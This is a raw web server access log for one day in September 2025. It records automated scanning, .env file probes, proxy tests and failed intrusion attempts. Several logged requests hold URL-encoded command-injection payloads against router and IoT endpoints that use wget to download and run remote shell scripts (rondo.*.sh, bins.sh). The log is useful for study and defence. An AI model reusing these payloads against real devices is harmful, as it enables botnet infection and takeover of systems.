45.156.87.165 - - [01/Sep/2025:00:56:53 +0200] "POST /tmUnblock.cgi HTTP/1.1" 404 731
45.156.87.165 - - [01/Sep/2025:00:56:53 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
45.156.87.165 - - [01/Sep/2025:00:56:53 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.zqq.sh%7Csh%60 HTTP/1.1" 404 756
45.156.87.165 - - [01/Sep/2025:00:56:53 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F&currentsetting.htm=1 HTTP/1.1" 404 727
45.156.87.165 - - [01/Sep/2025:00:56:53 +0200] "GET null HTTP/1.1" 400 1994
45.156.87.165 - - [01/Sep/2025:00:56:53 +0200] "POST /apply_sec.cgi HTTP/1.1" 404 731
45.156.87.165 - - [01/Sep/2025:00:56:53 +0200] "POST /goform/mp HTTP/1.1" 404 731
45.156.87.165 - - [01/Sep/2025:00:56:53 +0200] "GET /goform/setUsbUnload/.js?deviceName=A%3Bbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.uzz.sh%7Csh%26echo%20 HTTP/1.0" 404 749
45.156.87.165 - - [01/Sep/2025:00:56:53 +0200] "POST /goform/setPingInfo HTTP/1.1" 404 740
45.156.87.165 - - [01/Sep/2025:00:56:53 +0200] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 404 751
45.156.87.165 - - [01/Sep/2025:00:56:53 +0200] "POST /diagnostic.php HTTP/1.1" 404 732
45.156.87.165 - - [01/Sep/2025:00:56:53 +0200] "GET / HTTP/1.1" 200 1895
45.156.87.165 - - [01/Sep/2025:00:56:53 +0200] "GET /HNAP1/ HTTP/1.1" 404 728
45.156.87.165 - - [01/Sep/2025:00:56:53 +0200] "POST /goform/SystemCommand HTTP/1.1" 404 742
138.199.18.147 - - [01/Sep/2025:01:11:20 +0200] "CONNECT www.uni-konstanz.de:443 HTTP/1.1" 400 804
45.135.193.253 - - [01/Sep/2025:01:26:40 +0200] "GET / HTTP/1.1" 200 1895
147.185.132.46 - - [01/Sep/2025:01:35:49 +0200] "GET / HTTP/1.1" 200 1895
205.185.127.70 - - [01/Sep/2025:01:40:04 +0200] "GET /.env-develop HTTP/1.1" 404 730
167.99.149.55 - - [01/Sep/2025:02:20:26 +0200] "GET / HTTP/1.1" 200 1895
205.210.31.105 - - [01/Sep/2025:02:44:41 +0200] "GET / HTTP/1.0" 200 1895
45.135.193.253 - - [01/Sep/2025:02:50:22 +0200] "GET / HTTP/1.1" 200 1895
144.172.103.95 - - [01/Sep/2025:03:33:36 +0200] "GET / HTTP/1.0" 200 1895
205.185.127.70 - - [01/Sep/2025:03:54:45 +0200] "GET /.env.copy.sandbox5 HTTP/1.1" 404 736
91.185.57.177 - - [01/Sep/2025:04:03:51 +0200] "GET / HTTP/1.1" 200 1895
45.142.193.123 - - [01/Sep/2025:04:18:40 +0200] "-" 400 1930
74.82.47.2 - - [01/Sep/2025:04:23:36 +0200] "-" 400 1930
196.251.86.39 - - [01/Sep/2025:04:56:29 +0200] "GET / HTTP/1.1" 200 1895
45.156.87.165 - - [01/Sep/2025:05:14:39 +0200] "POST /tmUnblock.cgi HTTP/1.1" 404 731
45.156.87.165 - - [01/Sep/2025:05:14:39 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
45.156.87.165 - - [01/Sep/2025:05:14:39 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.zqq.sh%7Csh%60 HTTP/1.1" 404 756
45.156.87.165 - - [01/Sep/2025:05:14:39 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F&currentsetting.htm=1 HTTP/1.1" 404 727
45.156.87.165 - - [01/Sep/2025:05:14:39 +0200] "GET null HTTP/1.1" 400 1994
45.156.87.165 - - [01/Sep/2025:05:14:39 +0200] "POST /apply_sec.cgi HTTP/1.1" 404 731
45.156.87.165 - - [01/Sep/2025:05:14:39 +0200] "POST /goform/mp HTTP/1.1" 404 731
45.156.87.165 - - [01/Sep/2025:05:14:39 +0200] "GET /goform/setUsbUnload/.js?deviceName=A%3Bbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.uzz.sh%7Csh%26echo%20 HTTP/1.0" 404 749
45.156.87.165 - - [01/Sep/2025:05:14:39 +0200] "POST /goform/setPingInfo HTTP/1.1" 404 740
45.156.87.165 - - [01/Sep/2025:05:14:39 +0200] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 404 751
45.156.87.165 - - [01/Sep/2025:05:14:39 +0200] "POST /diagnostic.php HTTP/1.1" 404 732
45.156.87.165 - - [01/Sep/2025:05:14:39 +0200] "GET / HTTP/1.1" 200 1895
45.156.87.165 - - [01/Sep/2025:05:14:40 +0200] "GET /HNAP1/ HTTP/1.1" 404 728
45.156.87.165 - - [01/Sep/2025:05:14:40 +0200] "POST /goform/SystemCommand HTTP/1.1" 404 742
45.135.193.253 - - [01/Sep/2025:05:31:03 +0200] "GET / HTTP/1.1" 200 1895
111.118.148.138 - - [01/Sep/2025:06:03:35 +0200] "GET / HTTP/1.1" 200 1895
162.243.56.102 - - [01/Sep/2025:06:09:12 +0200] "-" 400 1930
162.243.56.102 - - [01/Sep/2025:06:09:13 +0200] "-" 400 1930
162.243.56.102 - - [01/Sep/2025:06:09:13 +0200] "GET / HTTP/1.1" 200 1895
162.243.56.102 - - [01/Sep/2025:06:09:13 +0200] "GET /download/powershell/ HTTP/1.1" 404 746
162.243.56.102 - - [01/Sep/2025:06:09:13 +0200] "GET /get.php HTTP/1.1" 404 725
205.185.127.70 - - [01/Sep/2025:06:10:37 +0200] "GET /.env.copy.sandbox3 HTTP/1.1" 404 736
172.212.200.96 - - [01/Sep/2025:06:27:14 +0200] "GET /actuator/health HTTP/1.1" 404 737
62.84.179.95 - - [01/Sep/2025:06:36:42 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
65.49.1.162 - - [01/Sep/2025:06:37:32 +0200] "GET / HTTP/1.1" 200 1895
65.49.1.166 - - [01/Sep/2025:06:38:09 +0200] "GET /favicon.ico HTTP/1.1" 404 729
65.49.1.164 - - [01/Sep/2025:06:38:18 +0200] "GET /?format=json HTTP/1.1" 200 1895
65.49.1.166 - - [01/Sep/2025:06:38:23 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804
65.49.1.162 - - [01/Sep/2025:06:38:28 +0200] "GET /geoserver/web/ HTTP/1.1" 404 740
3.130.96.91 - - [01/Sep/2025:07:00:57 +0200] "GET / HTTP/1.1" 200 1895
3.130.96.91 - - [01/Sep/2025:07:02:48 +0200] "GET / HTTP/1.1" 200 1895
3.130.96.91 - - [01/Sep/2025:07:04:59 +0200] "-" 400 1930
3.130.96.91 - - [01/Sep/2025:07:07:15 +0200] "-" 400 1930
3.130.96.91 - - [01/Sep/2025:07:09:23 +0200] "-" 400 1930
144.172.103.95 - - [01/Sep/2025:08:05:04 +0200] "GET / HTTP/1.0" 200 1895
205.185.127.70 - - [01/Sep/2025:08:27:08 +0200] "GET /.env.tmp HTTP/1.1" 404 726
45.135.193.253 - - [01/Sep/2025:08:37:02 +0200] "GET / HTTP/1.1" 200 1895
144.172.103.95 - - [01/Sep/2025:09:02:53 +0200] "GET / HTTP/1.0" 200 1895
71.6.232.30 - - [01/Sep/2025:10:05:10 +0200] "GET / HTTP/1.1" 200 1895
205.185.127.70 - - [01/Sep/2025:10:43:31 +0200] "GET /.envs_.backend HTTP/1.1" 404 732
92.42.201.26 - - [01/Sep/2025:11:22:37 +0200] "GET /json/ HTTP/1.1" 404 727
92.42.201.26 - - [01/Sep/2025:11:22:37 +0200] "-" 400 1930
92.42.201.26 - - [01/Sep/2025:11:22:37 +0200] "-" 400 1930
45.135.193.253 - - [01/Sep/2025:11:36:27 +0200] "GET / HTTP/1.1" 200 1895
196.251.81.116 - - [01/Sep/2025:11:52:12 +0200] "-" 400 1930
196.251.81.116 - - [01/Sep/2025:11:52:17 +0200] "-" 400 1930
196.251.81.116 - - [01/Sep/2025:11:52:22 +0200] "CONNECT 196.251.81.116:80 HTTP/1.0" 400 804
196.251.81.116 - - [01/Sep/2025:11:52:30 +0200] "-" 400 1930
196.251.81.116 - - [01/Sep/2025:11:52:35 +0200] "-" 400 1930
196.251.81.116 - - [01/Sep/2025:11:52:40 +0200] "-" 400 1930
196.251.81.116 - - [01/Sep/2025:11:52:43 +0200] "CONNECT 196.251.81.116:80 HTTP/1.0" 400 804
196.251.81.116 - - [01/Sep/2025:11:52:48 +0200] "-" 400 1930
196.251.81.116 - - [01/Sep/2025:11:52:52 +0200] "-" 400 1930
196.251.81.116 - - [01/Sep/2025:11:52:55 +0200] "-" 400 1930
196.251.81.116 - - [01/Sep/2025:11:53:01 +0200] "-" 400 1930
196.251.81.116 - - [01/Sep/2025:11:53:05 +0200] "CONNECT 196.251.81.116:80 HTTP/1.0" 400 804
196.251.81.116 - - [01/Sep/2025:11:53:09 +0200] "-" 400 1930
196.251.81.116 - - [01/Sep/2025:11:53:13 +0200] "-" 400 1930
196.251.81.116 - - [01/Sep/2025:11:53:18 +0200] "-" 400 1930
196.251.81.116 - - [01/Sep/2025:11:53:24 +0200] "CONNECT 196.251.81.116:80 HTTP/1.0" 400 804
196.251.81.116 - - [01/Sep/2025:11:53:29 +0200] "-" 400 1930
196.251.81.116 - - [01/Sep/2025:11:53:34 +0200] "CONNECT 196.251.81.116:80 HTTP/1.0" 400 804
196.251.81.116 - - [01/Sep/2025:11:53:40 +0200] "-" 400 1930
196.251.81.116 - - [01/Sep/2025:11:53:44 +0200] "-" 400 1930
196.251.81.116 - - [01/Sep/2025:11:53:49 +0200] "-" 400 1930
196.251.81.116 - - [01/Sep/2025:11:53:55 +0200] "CONNECT 196.251.81.116:80 HTTP/1.0" 400 804
196.251.81.116 - - [01/Sep/2025:11:54:01 +0200] "CONNECT 196.251.81.116:80 HTTP/1.0" 400 804
196.251.81.116 - - [01/Sep/2025:11:54:06 +0200] "-" 400 1930
196.251.81.116 - - [01/Sep/2025:11:54:16 +0200] "-" 400 1930
196.251.81.116 - - [01/Sep/2025:11:54:22 +0200] "-" 400 1930
196.251.81.116 - - [01/Sep/2025:11:54:26 +0200] "-" 400 1930
196.251.81.116 - - [01/Sep/2025:11:54:35 +0200] "CONNECT 196.251.81.116:80 HTTP/1.0" 400 804
196.251.81.116 - - [01/Sep/2025:11:54:43 +0200] "-" 400 1930
196.251.81.116 - - [01/Sep/2025:11:54:47 +0200] "-" 400 1930
196.251.81.116 - - [01/Sep/2025:11:54:53 +0200] "-" 400 1930
162.142.125.201 - - [01/Sep/2025:11:58:31 +0200] "-" 400 1930
162.142.125.201 - - [01/Sep/2025:11:58:32 +0200] "GET / HTTP/1.1" 200 1895
176.65.149.28 - - [01/Sep/2025:12:09:35 +0200] "GET / HTTP/1.1" 200 1895
176.65.149.28 - - [01/Sep/2025:12:09:35 +0200] "GET / HTTP/1.1" 200 1895
176.65.149.28 - - [01/Sep/2025:12:09:36 +0200] "GET /baba.php?cmd=wget%20%20http%3A%2F%2F45.138.16.158%2Fbins.sh%3B%20chmod%20777%20%2A%3B%20sh%20bins.sh HTTP/1.1" 404 726
172.203.245.49 - - [01/Sep/2025:12:28:50 +0200] "-" 400 1930
205.185.127.70 - - [01/Sep/2025:12:59:23 +0200] "GET /.env.save.6.april.22 HTTP/1.1" 404 738
20.29.23.166 - - [01/Sep/2025:13:11:19 +0200] "GET / HTTP/1.1" 200 1895
152.53.209.147 - - [01/Sep/2025:13:57:33 +0200] "GET / HTTP/1.1" 200 1895
152.53.209.147 - - [01/Sep/2025:13:57:33 +0200] "POST /HNAP1/ HTTP/1.1" 404 728
144.172.103.95 - - [01/Sep/2025:14:13:19 +0200] "GET / HTTP/1.0" 200 1895
91.148.240.190 - - [01/Sep/2025:14:38:30 +0200] "GET / HTTP/1.1" 200 1895
204.76.203.29 - - [01/Sep/2025:14:56:54 +0200] "CONNECT cfdump.packetsdatabase.com:443 HTTP/1.1" 400 804
205.185.127.70 - - [01/Sep/2025:15:15:50 +0200] "GET /.env.save.2 HTTP/1.1" 404 729
45.135.193.253 - - [01/Sep/2025:15:26:59 +0200] "GET / HTTP/1.1" 200 1895
196.251.66.3 - - [01/Sep/2025:15:39:51 +0200] "-" 400 1930
196.251.66.3 - - [01/Sep/2025:15:39:59 +0200] "-" 400 1930
196.251.66.3 - - [01/Sep/2025:15:40:05 +0200] "CONNECT 196.251.66.3:80 HTTP/1.0" 400 804
196.251.66.3 - - [01/Sep/2025:15:40:14 +0200] "-" 400 1930
196.251.66.3 - - [01/Sep/2025:15:40:21 +0200] "-" 400 1930
196.251.66.3 - - [01/Sep/2025:15:40:28 +0200] "-" 400 1930
196.251.66.3 - - [01/Sep/2025:15:40:35 +0200] "-" 400 1930
196.251.66.3 - - [01/Sep/2025:15:40:42 +0200] "-" 400 1930
196.251.66.3 - - [01/Sep/2025:15:40:49 +0200] "-" 400 1930
196.251.66.3 - - [01/Sep/2025:15:41:00 +0200] "-" 400 1930
196.251.66.3 - - [01/Sep/2025:15:41:10 +0200] "-" 400 1930
196.251.66.3 - - [01/Sep/2025:15:41:16 +0200] "-" 400 1930
196.251.66.3 - - [01/Sep/2025:15:41:24 +0200] "CONNECT 196.251.66.3:80 HTTP/1.0" 400 804
196.251.66.3 - - [01/Sep/2025:15:41:29 +0200] "-" 400 1930
196.251.66.3 - - [01/Sep/2025:15:41:36 +0200] "-" 400 1930
196.251.66.3 - - [01/Sep/2025:15:41:42 +0200] "-" 400 1930
196.251.66.3 - - [01/Sep/2025:15:41:50 +0200] "CONNECT 196.251.66.3:80 HTTP/1.0" 400 804
196.251.66.3 - - [01/Sep/2025:15:42:00 +0200] "-" 400 1930
196.251.66.3 - - [01/Sep/2025:15:42:08 +0200] "-" 400 1930
196.251.66.3 - - [01/Sep/2025:15:42:13 +0200] "-" 400 1930
196.251.66.3 - - [01/Sep/2025:15:42:21 +0200] "CONNECT 196.251.66.3:80 HTTP/1.0" 400 804
196.251.66.3 - - [01/Sep/2025:15:42:31 +0200] "-" 400 1930
196.251.66.3 - - [01/Sep/2025:15:42:39 +0200] "CONNECT 196.251.66.3:80 HTTP/1.0" 400 804
196.251.66.3 - - [01/Sep/2025:15:42:46 +0200] "CONNECT 196.251.66.3:80 HTTP/1.0" 400 804
196.251.66.3 - - [01/Sep/2025:15:42:54 +0200] "-" 400 1930
196.251.66.3 - - [01/Sep/2025:15:43:00 +0200] "-" 400 1930
196.251.66.3 - - [01/Sep/2025:15:43:08 +0200] "-" 400 1930
196.251.66.3 - - [01/Sep/2025:15:43:14 +0200] "CONNECT 196.251.66.3:80 HTTP/1.0" 400 804
196.251.66.3 - - [01/Sep/2025:15:43:21 +0200] "-" 400 1930
196.251.66.3 - - [01/Sep/2025:15:43:29 +0200] "CONNECT 196.251.66.3:80 HTTP/1.0" 400 804
196.251.66.3 - - [01/Sep/2025:15:43:35 +0200] "-" 400 1930
196.251.66.3 - - [01/Sep/2025:15:43:41 +0200] "-" 400 1930
196.251.66.3 - - [01/Sep/2025:15:43:50 +0200] "-" 400 1930
196.251.66.3 - - [01/Sep/2025:15:44:01 +0200] "-" 400 1930
196.251.66.3 - - [01/Sep/2025:15:44:12 +0200] "CONNECT 196.251.66.3:80 HTTP/1.0" 400 804
176.65.149.164 - - [01/Sep/2025:16:30:33 +0200] "GET /login HTTP/1.1" 404 723
178.22.24.16 - - [01/Sep/2025:16:49:58 +0200] "-" 400 1930
178.22.24.16 - - [01/Sep/2025:16:49:58 +0200] "-" 400 1930
112.43.32.109 - - [01/Sep/2025:17:06:55 +0200] "GET / HTTP/1.1" 200 1895
206.123.145.153 - - [01/Sep/2025:17:30:48 +0200] "GET /login HTTP/1.1" 404 723
205.185.127.70 - - [01/Sep/2025:17:35:02 +0200] "GET /.env_production HTTP/1.1" 404 733
196.251.73.24 - - [01/Sep/2025:17:38:34 +0200] "GET /login HTTP/1.1" 404 723
144.172.103.95 - - [01/Sep/2025:17:55:54 +0200] "GET / HTTP/1.0" 200 1895
45.135.193.253 - - [01/Sep/2025:18:30:38 +0200] "GET / HTTP/1.1" 200 1895
66.132.153.60 - - [01/Sep/2025:18:59:16 +0200] "GET / HTTP/1.1" 200 1895
66.132.153.60 - - [01/Sep/2025:18:59:19 +0200] "GET / HTTP/1.1" 200 1895
66.132.153.60 - - [01/Sep/2025:18:59:19 +0200] "GET /favicon.ico HTTP/1.1" 404 729
66.132.153.60 - - [01/Sep/2025:18:59:23 +0200] "GET /favicon.ico HTTP/1.1" 404 729
66.132.153.60 - - [01/Sep/2025:18:59:23 +0200] "GET /security.txt HTTP/1.1" 404 730
196.251.73.24 - - [01/Sep/2025:19:23:49 +0200] "GET /login HTTP/1.1" 404 723
205.185.127.70 - - [01/Sep/2025:19:50:32 +0200] "GET /.env.prd HTTP/1.1" 404 726
68.183.215.212 - - [01/Sep/2025:20:25:22 +0200] "-" 400 1930
68.183.215.212 - - [01/Sep/2025:20:25:22 +0200] "-" 400 1930
68.183.215.212 - - [01/Sep/2025:20:25:22 +0200] "GET / HTTP/1.1" 200 1895
68.183.215.212 - - [01/Sep/2025:20:25:22 +0200] "GET /download/powershell/ HTTP/1.1" 404 746
68.183.215.212 - - [01/Sep/2025:20:25:22 +0200] "GET /get.php HTTP/1.1" 404 725
80.75.212.17 - - [01/Sep/2025:20:35:39 +0200] "CONNECT httpbin.org:443 HTTP/1.1" 400 804
135.237.125.106 - - [01/Sep/2025:20:50:29 +0200] "-" 400 1930
45.9.168.192 - - [01/Sep/2025:20:58:33 +0200] "-" 400 1930
45.9.168.192 - - [01/Sep/2025:20:58:33 +0200] "POST /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 HTTP/1.1" 404 754
35.202.9.133 - - [01/Sep/2025:21:11:12 +0200] "GET / HTTP/1.1" 200 1895
45.135.193.253 - - [01/Sep/2025:21:33:08 +0200] "GET / HTTP/1.1" 200 1895
44.220.185.130 - - [01/Sep/2025:21:45:04 +0200] "GET / HTTP/1.1" 200 1895
205.185.127.70 - - [01/Sep/2025:22:05:45 +0200] "GET /.env.local_back HTTP/1.1" 404 733
206.168.34.124 - - [01/Sep/2025:22:59:21 +0200] "GET / HTTP/1.1" 200 1895
206.168.34.124 - - [01/Sep/2025:22:59:29 +0200] "GET / HTTP/1.1" 200 1895
206.168.34.124 - - [01/Sep/2025:22:59:31 +0200] "GET /favicon.ico HTTP/1.1" 404 729
206.168.34.124 - - [01/Sep/2025:22:59:40 +0200] "GET /favicon.ico HTTP/1.1" 404 729
206.168.34.124 - - [01/Sep/2025:22:59:41 +0200] "GET /security.txt HTTP/1.1" 404 730
196.251.89.45 - - [01/Sep/2025:23:24:34 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804
196.251.89.45 - - [01/Sep/2025:23:24:34 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804
196.251.89.45 - - [01/Sep/2025:23:25:01 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804
196.251.89.45 - - [01/Sep/2025:23:25:02 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804
194.165.16.164 - - [01/Sep/2025:23:34:49 +0200] "-" 400 1930
152.53.209.147 - - [01/Sep/2025:23:52:28 +0200] "GET / HTTP/1.1" 200 1895
152.53.209.147 - - [01/Sep/2025:23:52:29 +0200] "POST /HNAP1/ HTTP/1.1" 404 728